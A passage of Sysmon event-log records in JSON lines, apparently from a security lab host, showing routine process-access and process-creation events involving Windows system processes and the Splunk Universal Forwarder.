{"EventTime":"2020-08-01 05:56:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6257,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:53.070\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:53.070","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6258,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:53.070\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:53.070","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6259,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:53.070\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:53.070","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6260,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:53.070\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:53.070","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6261,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:53.070\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:53.070","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6262,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:53.070\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:53.070","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6263,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:53.070\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0425-5F25-0000-0010678C0B00}\r\nTargetProcessId: 1344\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:53.070","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0425-5F25-0000-0010678C0B00}","TargetProcessId":"1344","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6264,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:53.211\r\nSourceProcessGUID: {A837DB8D-0425-5F25-0000-0010678C0B00}\r\nSourceProcessId: 1344\r\nSourceThreadId: 2596\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:53.211","SourceProcessGUID":"{A837DB8D-0425-5F25-0000-0010678C0B00}","SourceProcessId":"1344","SourceThreadId":"2596","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6265,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:53.930\r\nProcessGuid: {A837DB8D-0425-5F25-0000-00104C8E0B00}\r\nProcessId: 4604\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:56:53.930","ProcessGuid":"{A837DB8D-0425-5F25-0000-00104C8E0B00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program 